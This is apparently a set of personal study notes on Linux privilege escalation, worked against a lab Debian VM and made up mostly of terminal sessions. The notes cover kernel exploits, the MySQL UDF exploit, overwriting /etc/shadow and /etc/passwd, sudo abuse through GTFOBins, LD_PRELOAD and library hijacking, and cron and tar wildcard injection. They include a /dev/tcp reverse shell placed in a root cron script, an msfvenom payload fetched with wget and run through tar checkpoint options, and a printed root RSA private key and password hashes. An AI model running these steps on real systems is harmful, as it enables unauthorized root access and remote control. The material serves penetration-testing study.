Linux Privilege Escalation

These are some techniques for Linux Privilege Escalation

Kernel Exploits

What is a Kernel?

THIS SHOULD BE YOUR LAST RESORT, Kernel exploits can be unstable and may crash the system!
Kernels are the core of any operating system
Think of it as a layer between application software and the actual computer hardware.
Kernel has the complete control over the operating system. This can result in execution as the root users

How do I find Kernel Exploits?

Enumerate kernel versions (uname -a )
Find matching exploits (Google, ExploitDB, GitHub)
Compile and run

Kernel Exploit Example

Kernel Version is 2.6.32

Using Searchsploit to find exploit

More specific search

Using Linux Exploit Suggesster 2

GitHub - jondonas/linux-exploit-suggester-2: Next-Generation Linux Kernel Exploit SuggesterGitHub

./linux-exploit-suggester-2.pl -k 2.6.32

  #############################
    Linux Exploit Suggester 2
  #############################

  Local Kernel: 2.6.32
  Searching 72 exploits...

  Possible Exploits
  [1] american-sign-language
      CVE-2010-4347
      Source: http://www.securityfocus.com/bid/45408
  [2] can_bcm
      CVE-2010-2959
      Source: http://www.exploit-db.com/exploits/14814
  [3] dirty_cow
      CVE-2016-5195
      Source: http://www.exploit-db.com/exploits/40616
  [4] exploit_x
      CVE-2018-14665
      Source: http://www.exploit-db.com/exploits/45697
  [5] half_nelson1
      Alt: econet       CVE-2010-3848
      Source: http://www.exploit-db.com/exploits/17787
  [6] half_nelson2
      Alt: econet       CVE-2010-3850
      Source: http://www.exploit-db.com/exploits/17787
  [7] half_nelson3
      Alt: econet       CVE-2010-4073
      Source: http://www.exploit-db.com/exploits/17787
  [8] msr
      CVE-2013-0268
      Source: http://www.exploit-db.com/exploits/27297
  [9] pktcdvd
      CVE-2010-3437
      Source: http://www.exploit-db.com/exploits/15150
  [10] ptrace_kmod2
      Alt: ia32syscall,robert_you_suck       CVE-2010-3301
      Source: http://www.exploit-db.com/exploits/15023
  [11] rawmodePTY
      CVE-2014-0196
      Source: http://packetstormsecurity.com/files/download/126603/cve-2014-0196-md.c
  [12] rds
      CVE-2010-3904
      Source: http://www.exploit-db.com/exploits/15285
  [13] reiserfs
      CVE-2010-1146
      Source: http://www.exploit-db.com/exploits/12130
  [14] video4linux
      CVE-2010-3081
      Source: http://www.exploit-db.com/exploits/15024

Looking at the results, we can see that we have a popular kernel exploit (Dirty COW)

Run exploit and execute /usr/bin/passwd binary

Service Exploits

What are Services?

Programs that run in the background, acceptin input or performing regular tasks.
If vulnerable services are running as root, exploitin them can lead to command exection as root.
Service exploits can be found using Searchsploit, Google and GitHub.

Services Running as Root

The follwing command will show all processes that are running as root.

ps aux | grep "^root"

With the results, as with any, try to identify the version number of the program being executed.

Enumerating Program Versions

<program> --version
<program> -v

#DPKG CAN SHOW INSTALLED PROGRAMS AND THEIR VERSION
dpkg -l | grep <program> 

#RPM SYSTEMS
rpm -qa | grep <program>

Service Exploit Example

./lse.sh -l 1 -i

MySQL is running as root .
You can connect to MySQL as root without a password!

You can verify with:

ps aux | grep '^root'

This will list processes that run as root *mysqld

Why is this important?

MySQL has the ability to install user defined functions which run via shared objects. The following exploit can be used to install a new function that will allow us to execute system commands from a mysql command prompt. commands will be executed as root because mysql is running as root.

MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2)Exploit Database

gcc -g -c raptor_udf2.c -fPIC
Execute commands

Port Forwarding

'Sometimes root processes may be bound to an internal port, through which it communicates. You can forward the port using the follwing SSH command:

ssh -R <local-port>:127.0.0.1:<service-port> <username>@<local-machine>

#Determice which port MYSQL is listening.
netstat -nl


#ON OUR TARGET MACHINE
ssh -R 4444:127.0.0.1:3306 kali@10.0.2.4

#ON OUR KALI MACHINE
mysql -u root -h 127.0.0.1 -P 4444

select @@hostname;

Weak File Permissions

If permissions on files are weak, system files can be taken advantage of to perform privelege escalation.

/etc/shadow contains password hashes and by default is only readable by root.
If we can read this file, we may be able to crack the root users hash.
If we can modify, we can replace root user hash with a hash we know.

./lin.sh -i | more 
!] sys030 Can we read /etc/shadow file?................................... yes!
---
root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::
daemon:*:17298:0:99999:7:::
bin:*:17298:0:99999:7:::
sys:*:17298:0:99999:7:::
sync:*:17298:0:99999:7:::
games:*:17298:0:99999:7:::
man:*:17298:0:99999:7:::
lp:*:17298:0:99999:7:::
mail:*:17298:0:99999:7:::
news:*:17298:0:99999:7:::
uucp:*:17298:0:99999:7:::
proxy:*:17298:0:99999:7:::
www-data:*:17298:0:99999:7:::
backup:*:17298:0:99999:7:::
list:*:17298:0:99999:7:::
irc:*:17298:0:99999:7:::
gnats:*:17298:0:99999:7:::
nobody:*:17298:0:99999:7:::
libuuid:!:17298:0:99999:7:::
Debian-exim:!:17298:0:99999:7:::
sshd:*:17298:0:99999:7:::
user:$6$M1tQjkeb$M1A/ArH4JeyF1zBJPLQ.TZQR1locUlz0wIZsoY6aDOZRFrYirKDW5IJy32FBGjwYpT2O1zrR2xTROv7wRIkF8.:17298:0:99999:7:::
statd:*:17299:0:99999:7:::
mysql:!:18133:0:99999:7:::

#We have readble and writeable
user@debian:~/tools/privesc-scripts$ ls -l /etc/shadow
-rw-r--rw- 1 root shadow 837 Aug 25  2019 /etc/shadow
user@debian:~/tools/privesc-scripts$ 

user@debian:~/tools/privesc-scripts$ head -n 1 /etc/shadow
root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::
user@debian:~/tools/privesc-scripts$

This is important, the first two colons contain the hash.in this case it is:

$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0

Cracking the hash

kali@kali:~$ sudo john --format=sha512crypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
password123      (?)
1g 0:00:00:00 DONE (2021-01-04 19:48) 1.515g/s 2327p/s 2327c/s 2327C/s cuties..mexico1
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Writing to shadow

Similarly, because we can write onto the shadow file.

./lse -l 1 -i | more 
[*] fst000 Writable files outside user's home.............................. yes!
---
/var/tmp
/var/run/acpid.socket
/var/run/mysqld/mysqld.sock
/var/lock
/etc/exports
/etc/init.d/rc.local
/etc/passwd
/etc/shadow
/usr/local/bin/overwrite.sh
/usr/lib/mysql/plugin/raptor_udf2.so
/tmp
/tmp/tmp.xW1WW6YYpu
/tmp/tmp.bm5h9a7TlX
---


user@debian:~/tools/privesc-scripts$ ls -l /etc/shadow
-rw-r--rw- 1 root shadow 837 Aug 25  2019 /etc/shadow
user@debian:~/tools/privesc-scripts$ cp  /etc/shadow /home/user/shadow_backup
user@debian:~/tools/privesc-scripts$ cd
user@debian:~$ ls
myvpn.ovpn  shadow_backup  tools
user@debian:~$ mkpasswd -m sha-512 newpassword
$6$U/HhooXBT/y$YW6kInvyKKJUpIj53rarfn9rMaTWfKlw91KpRHPW88bVzPj3KAgFkYeb4sNZmoC7SfTS5lAYRhRVIyiEe4rjE.
user@debian:~$ 

user@debian:~$ mkpasswd -m sha-512 newpassword
$6$U/HhooXBT/y$YW6kInvyKKJUpIj53rarfn9rMaTWfKlw91KpRHPW88bVzPj3KAgFkYeb4sNZmoC7SfTS5lAYRhRVIyiEe4rjE.
user@debian:~$ vim /etc/shadow
user@debian:~$ su
Password: 
root@debian:/home/user#

Reading and Writing passwd file

/etc/passwd used to contain hashes, back in the day.
passwd takes precedent over the shadow file

root@debian:/home/user# ls -l /etc/passwd
-rw-r--rw- 1 root root 1009 Aug 25  2019 /etc/passwd
root@debian:/home/user# openssl passwd "password"
YQyhPgG7w5s3s
root@debian:/home/user# vi /etc/passwd
root@debian:/home/user# exit
exit
user@debian:~$ su 
Password: 
root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)
root@debian:/home/user# 


can also create a new user with root privleges by copying code to teh bottom as long as uid is 0 it is root

Backups

Eventhough backups may exist, they may be insecure backups. Check /home / (root) /tmp /var/backups

root@debian:/.ssh# cat root_key 
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA3IIf6Wczcdm38MZ9+QADSYq9FfKfwj0mJaUteyJHWHZ3/GNm
gLTH3Fov2Ss8QuGfvvD4CQ1f4N0PqnaJ2WJrKSP8QyxJ7YtRTk0JoTSGWTeUpExl
p4oSmTxYnO0LDcsezwNhBZn0kljtGu9p+dmmKbk40W4SWlTvU1LcEHRr6RgWMgQo
OHhxUFddFtYrknS4GiL5TJH6bt57xoIECnRc/8suZyWzgRzbo+TvDewK3ZhBN7HD
eV9G5JrjnVrDqSjhysUANmUTjUCTSsofUwlum+pU/dl9YCkXJRp7Hgy/QkFKpFET
Z36Z0g1JtQkwWxUD/iFj+iapkLuMaVT5dCq9kQIDAQABAoIBAQDDWdSDppYA6uz2
NiMsEULYSD0z0HqQTjQZbbhZOgkS6gFqa3VH2OCm6o8xSghdCB3Jvxk+i8bBI5bZ
YaLGH1boX6UArZ/g/mfNgpphYnMTXxYkaDo2ry/C6Z9nhukgEy78HvY5TCdL79Q+
5JNyccuvcxRPFcDUniJYIzQqr7laCgNU2R1lL87Qai6B6gJpyB9cP68rA02244el
WUXcZTk68p9dk2Q3tk3r/oYHf2LTkgPShXBEwP1VkF/2FFPvwi1JCCMUGS27avN7
VDFru8hDPCCmE3j4N9Sw6X/sSDR9ESg4+iNTsD2ziwGDYnizzY2e1+75zLyYZ4N7
6JoPCYFxAoGBAPi0ALpmNz17iFClfIqDrunUy8JT4aFxl0kQ5y9rKeFwNu50nTIW
1X+343539fKIcuPB0JY9ZkO9d4tp8M1Slebv/p4ITdKf43yTjClbd/FpyG2QNy3K
824ihKlQVDC9eYezWWs2pqZk/AqO2IHSlzL4v0T0GyzOsKJH6NGTvYhrAoGBAOL6
Wg07OXE08XsLJE+ujVPH4DQMqRz/G1vwztPkSmeqZ8/qsLW2bINLhndZdd1FaPzc
U7LXiuDNcl5u+Pihbv73rPNZOsixkklb5t3Jg1OcvvYcL6hMRwLL4iqG8YDBmlK1
Rg1CjY1csnqTOMJUVEHy0ofroEMLf/0uVRP3VsDzAoGBAIKFJSSt5Cu2GxIH51Zi
SXeaH906XF132aeU4V83ZGFVnN6EAMN6zE0c2p1So5bHGVSCMM/IJVVDp+tYi/GV
d+oc5YlWXlE9bAvC+3nw8P+XPoKRfwPfUOXp46lf6O8zYQZgj3r+0XLd6JA561Im
jQdJGEg9u81GI9jm2D60xHFFAoGAPFatRcMuvAeFAl6t4njWnSUPVwbelhTDIyfa
871GglRskHslSskaA7U6I9QmXxIqnL29ild+VdCHzM7XZNEVfrY8xdw8okmCR/ok
X2VIghuzMB3CFY1hez7T+tYwsTfGXKJP4wqEMsYntCoa9p4QYA+7I+LhkbEm7xk4
CLzB1T0CgYB2Ijb2DpcWlxjX08JRVi8+R7T2Fhh4L5FuykcDeZm1OvYeCML32EfN
Whp/Mr5B5GDmMHBRtKaiLS8/NRAokiibsCmMzQegmfipo+35DNTW66DDq47RFgR4
LnM9yXzn+CbIJGeJk5XUFQuLSv0f6uiaWNi7t9UNyayRmwejI6phSw==
-----END RSA PRIVATE KEY-----
root@debian:/.ssh# gretp PermitRootLogin /etc/ssh/sshd_config 
bash: gretp: command not found
root@debian:/.ssh# grep PermitRootLogin /etc/ssh/sshd_config 
PermitRootLogin yes
# the setting of "PermitRootLogin without-password".
root@debian:/.ssh# 



kali@kali:~$ vi root_key 
kali@kali:~$ chmod 600 root_key 
kali@kali:~$ ssh -i root_key root@10.0.2.7
Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Jan  3 14:00:26 2021
root@debian:~# id
uid=0(root) gid=0(root) groups=0(root)
root@debian:~#

Running Sudo

user@debian:~/tools/privesc-scripts$ ./lse.sh -i | more 
[!] sud010 Can we list sudo commands without a password?................... yes!
---
Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH

User user may run the following commands on this host:
    (root) NOPASSWD: /usr/sbin/iftop
    (root) NOPASSWD: /usr/bin/find
    (root) NOPASSWD: /usr/bin/nano
    (root) NOPASSWD: /usr/bin/vim
    (root) NOPASSWD: /usr/bin/man
    (root) NOPASSWD: /usr/bin/awk
    (root) NOPASSWD: /usr/bin/less
    (root) NOPASSWD: /usr/bin/ftp
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/sbin/apache2
    (root) NOPASSWD: /bin/more


user@debian:~/tools/privesc-scripts$ sudo -l 
Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH

User user may run the following commands on this host:
    (root) NOPASSWD: /usr/sbin/iftop
    (root) NOPASSWD: /usr/bin/find
    (root) NOPASSWD: /usr/bin/nano
    (root) NOPASSWD: /usr/bin/vim
    (root) NOPASSWD: /usr/bin/man
    (root) NOPASSWD: /usr/bin/awk
    (root) NOPASSWD: /usr/bin/less
    (root) NOPASSWD: /usr/bin/ftp
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/sbin/apache2
    (root) NOPASSWD: /bin/more

GTFOBinsgtfobins.github.io

user@debian:~/tools/privesc-scripts$ sudo find . -exec /bin/sh \; -quit
sh-4.1# id
uid=0(root) gid=0(root) groups=0(root)
sh-4.1# whoami
root

Utilizing Apache

user@debian:~/tools/privesc-scripts$ sudo apache2 -f /etc/shadow
Syntax error on line 1 of /etc/shadow:
Invalid command 'root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::', perhaps misspelled or defined by a module not included in the server configuration

LD_Preload

user@debian:~/tools/sudo$ sudo -l 
Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH

User user may run the following commands on this host:
    (root) NOPASSWD: /usr/sbin/iftop
    (root) NOPASSWD: /usr/bin/find
    (root) NOPASSWD: /usr/bin/nano
    (root) NOPASSWD: /usr/bin/vim
    (root) NOPASSWD: /usr/bin/man
    (root) NOPASSWD: /usr/bin/awk
    (root) NOPASSWD: /usr/bin/less
    (root) NOPASSWD: /usr/bin/ftp
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/sbin/apache2
    (root) NOPASSWD: /bin/more
user@debian:~/tools/sudo$ ls -l
total 8
-rw-r--r-- 1 user user 184 May 15  2020 library_path.c
-rw-r--r-- 1 user user 149 May 15  2020 preload.c
user@debian:~/tools/sudo$ gcc -fPIC -shared -nostartfiles -o /tmp/preload.so preload.c
user@debian:~/tools/sudo$ sudo LD_PRELOAD=/tmp/preload.so find
root@debian:/home/user/tools/sudo# id
uid=0(root) gid=0(root) groups=0(root)
root@debian:/home/user/tools/sudo# whoami
root

LD_LIBRARY_PATH

This environment variable contains a set of directories where shared libraries are searched first
ldd command can be used to print the shared libraries used by a program
```
ldd /usr/sbin/apache2
```
By creating a library with the same name as the one used by a program, and setting LDLIBRARY_PATH to its parent directory, the program will load our shared library instead.

user@debian:~/tools/sudo$ sudo -l 
Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH

User user may run the following commands on this host:
    (root) NOPASSWD: /usr/sbin/iftop
    (root) NOPASSWD: /usr/bin/find
    (root) NOPASSWD: /usr/bin/nano
    (root) NOPASSWD: /usr/bin/vim
    (root) NOPASSWD: /usr/bin/man
    (root) NOPASSWD: /usr/bin/awk
    (root) NOPASSWD: /usr/bin/less
    (root) NOPASSWD: /usr/bin/ftp
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/sbin/apache2
    (root) NOPASSWD: /bin/more
user@debian:~/tools/sudo$ ldd /usr/sbin/apache2
	linux-vdso.so.1 =>  (0x00007fff42178000)
	libpcre.so.3 => /lib/x86_64-linux-gnu/libpcre.so.3 (0x00007fa3a02e8000)
	libaprutil-1.so.0 => /usr/lib/libaprutil-1.so.0 (0x00007fa3a00c4000)
	libapr-1.so.0 => /usr/lib/libapr-1.so.0 (0x00007fa39fe8a000)
	libpthread.so.0 => /lib/libpthread.so.0 (0x00007fa39fc6e000)
	libc.so.6 => /lib/libc.so.6 (0x00007fa39f902000)
	libuuid.so.1 => /lib/libuuid.so.1 (0x00007fa39f6fd000)
	librt.so.1 => /lib/librt.so.1 (0x00007fa39f4f5000)
	libcrypt.so.1 => /lib/libcrypt.so.1 (0x00007fa39f2be000)
	libdl.so.2 => /lib/libdl.so.2 (0x00007fa39f0b9000)
	libexpat.so.1 => /usr/lib/libexpat.so.1 (0x00007fa39ee91000)
	/lib64/ld-linux-x86-64.so.2 (0x00007fa3a07a5000)
user@debian:~/tools/sudo$ ls
library_path.c  preload.c
user@debian:~/tools/sudo$ gcc -o libcrypt.so.1 -shared -fPIC library_path.c 
user@debian:~/tools/sudo$ sudo LD_LIBRARY_PATH=. apache2
apache2: ./libcrypt.so.1: no version information available (required by /usr/lib/libaprutil-1.so.0)
root@debian:/home/user/tools/sudo# id
uid=0(root) gid=0(root) groups=0(root)
root@debian:/home/user/tools/sudo#

CronJOBBERS

Cronjobs are programs or scripts that run at a scheduled time at certain time intervals
Crontabs store configuration for cronjobs. These are located at.
- /var/spool/cron/
- /var/spool/cro!n/crontabs/
- systemwide /etc/crontab

File Permissions

Misconfiguration of a file permission associated with a cronjob can lead to easy Root!

./lse.sh -l 1 -i | more

[*] ret020 Cron jobs....................................................... yes!
---
/etc/crontab:SHELL=/bin/sh
/etc/crontab:PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
/etc/crontab:17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
/etc/crontab:25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
/etc/crontab:47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
/etc/crontab:52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
/etc/crontab:* * * * * root overwrite.sh
/etc/crontab:* * * * * root /usr/local/bin/compress.sh

q:q^Cuser@debian:~/tools/privesc-scripts$ cat /etc/crontab 
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root overwrite.sh
* * * * * root /usr/local/bin/compress.sh

user@debian:~/tools/privesc-scripts$ locate overwrite.sh
/usr/local/bin/overwrite.sh
user@debian:~/tools/privesc-scripts$ ls -l /usr/local/bin/overwrite.sh
-rwxr--rw- 1 root staff 40 May 13  2017 /usr/local/bin/overwrite.sh
user@debian:~/tools/privesc-scripts$ 

#REVERSE SHELL ON THE JOBBER
user@debian:~/tools/privesc-scripts$ ls -l /usr/local/bin/overwrite.sh
-rwxr--rw- 1 root staff 40 May 13  2017 /usr/local/bin/overwrite.sh
user@debian:~/tools/privesc-scripts$ vi /usr/local/bin/overwrite.sh 
user@debian:~/tools/privesc-scripts$ vi /usr/local/bin/overwrite.sh 
user@debian:~/tools/privesc-scripts$ cat /usr/local/bin/overwrite.sh 
#!/bin/bash

/bin/bash -i >& /dev/tcp/10.0.2.4/1111 0>&1
user@debian:~/tools/privesc-scripts$

Writing Paths present in Cronjobs

PATH Environment variable is by default set to /usr/bin/:bin
PATH variable can be overwritten in the crontab file
If cronjob does not use an absolute path, and one of the PATH directories is writeable by our user, we may be able to create a program/script with the same name as the cronjob

./lse.sh -l 1 -i | more
[!] ret060 Can we write to executable paths present in cron jobs........... yes!
---
/etc/crontab:PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin


user@debian:~/tools/privesc-scripts$ vim overwrite.sh
user@debian:~/tools/privesc-scripts$ chmod +x overwrite.sh 
user@debian:~/tools/privesc-scripts$ watch -n 1 ls -l /tmp
user@debian:~/tools/privesc-scripts$ pwd
/home/user/tools/privesc-scripts
user@debian:~/tools/privesc-scripts$ cp overwrite.sh /home/user/
user@debian:~/tools/privesc-scripts$ watch -n 1 ls -l /tmp
user@debian:~/tools/privesc-scripts$ ls -l /tmp/
total 1044
-rw-r--r-- 1 root root 100740 Jan  4 08:29 backup.tar.gz
-rwxr-xr-x 1 user user   3857 Jan  4 07:36 preload.so
-rwsr-sr-x 1 root root 926536 Jan  4 08:29 rootbash
-rw------- 1 user user   7817 Jan  4 08:04 tmp.5CqN3heSzG
-rw------- 1 user user  11151 Jan  4 08:03 tmp.EVXGVRQj7P
-rw-r--r-- 1 root root     28 Jan  4 08:09 useless
user@debian:~/tools/privesc-scripts$ /tmp/rootbash -p
rootbash-4.1# id
uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)
rootbash-4.1# whoami
root

WildCards

tar | GTFOBinsgtfobins.github.io

On our Attacker Machine

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.0.2.4 LPORT=4444 -f elf -o shell.elf

On our target machine

user@debian:~$ cat /usr/local/bin/compress.sh
#!/bin/sh
cd /home/user
tar czf /tmp/backup.tar.gz *
user@debian:~$ wget http://10.0.2.4:80/shell.elf 
--2021-01-04 08:39:27--  http://10.0.2.4/shell.elf
Connecting to 10.0.2.4:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 194 [application/octet-stream]
Saving to: “shell.elf”

100%[=================================================================================================================>] 194         --.-K/s   in 0s      

2021-01-04 08:39:27 (52.0 MB/s) - “shell.elf” saved [194/194]

user@debian:~$ ls
myvpn.ovpn  overwrite.sh  shadow_backup  shell.elf  tools
user@debian:~$ chmod +x shell.elf 
user@debian:~$ touch ./--checkpoint=1
user@debian:~$ touch ./--checkpoint-action=exec=shell.elf
user@debian:~$

Attacker machine

kali@kali:~$ nc -lvnp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.0.2.7.
Ncat: Connection from 10.0.2.7:55114.
id
uid=0(root) gid=0(root) groups=0(root)

PreviousLinux Shortcuts

Last updated 4 years ago

Was this helpful?